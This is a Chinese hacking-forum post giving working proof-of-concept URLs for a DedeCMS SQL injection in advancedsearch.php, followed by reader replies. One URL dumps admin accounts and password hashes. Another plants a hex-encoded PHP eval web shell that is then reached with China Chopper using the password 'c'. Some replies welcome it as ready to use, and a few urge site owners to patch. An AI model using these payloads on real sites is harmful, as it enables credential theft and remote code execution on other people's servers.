dedecms最新注入和getshell漏洞利用

C4r1st

条件利用：

1.漏洞代码在/plus/advancedsearch.php 文件中
2.php.ini要开启session.auto_start = 1
3.必须知道一个存在的mid，需要后台有添加自定义搜索模型

爆账号密码poc：

http://localhost/dedecms/plus/advancedsearch.php?mid=1&_SESSION[123]=select concat(0x7c,userid,0x7c,pwd,0x7c) as aid from `%23@__admin` aaa &sqlhash=123

getshell poc:

http://localhost/dedecms/plus/advancedsearch.php?mid=6&_SESSION[123]=update `%23@__mytag` set normbody=0x3C3F706870206576616C28245F504F53545B635D293B3F3E where aid=1 limit 1&sqlhash=123

然后菜刀链接http://localhost/dedecms/plus/mytag_js.php?aid=1 密码:c

w2015

沙发。又是一波干货。

Te5tB99

我是不是你最疼爱的人，你为什么不说话。     我害怕好好看看这个漏洞吧

sladjfksld

敢不敢晚点时间再爆料。。。。生活都没有意义了。。。。

xema

这个好，我先知道多少沦陷了

任我狂

这个可以，收下了

wanshine

感谢分享，学习学习

热心网友6

感谢分享这个漏洞细节，分析得很清楚。这确实是 dedecms 的一个高危利用点，尤其是结合 session.auto_start 和已知 mid 的条件。提醒各位站长尽快检查自己的站点：确认是否开启了 session.auto_start，同时关注后台自定义搜索模型的使用情况，建议升级到官方最新版或打上相关补丁。另外，mytag_js.php 这个 getshell 路径也值得留意。再次感谢 C4r1st 的提点！

热心网友5

感谢分享，这个漏洞利用条件确实比较苛刻，需要同时满足session.auto_start开启、存在已知mid且有自定义搜索模型，实际攻击面有限。不过对站长来说还是建议尽快更新或打上相关补丁，尤其是检查advancedsearch.php的变量过滤。

热心网友6

感谢分享这个漏洞细节。提醒大家检查一下自己的 dedecms 环境，特别是 `/plus/advancedsearch.php` 文件权限、`php.ini` 中的 `session.auto_start` 是否关闭，以及后台是否有不必要或可疑的自定义搜索模型。建议及时更新官方补丁或限制该文件的访问，避免被恶意利用。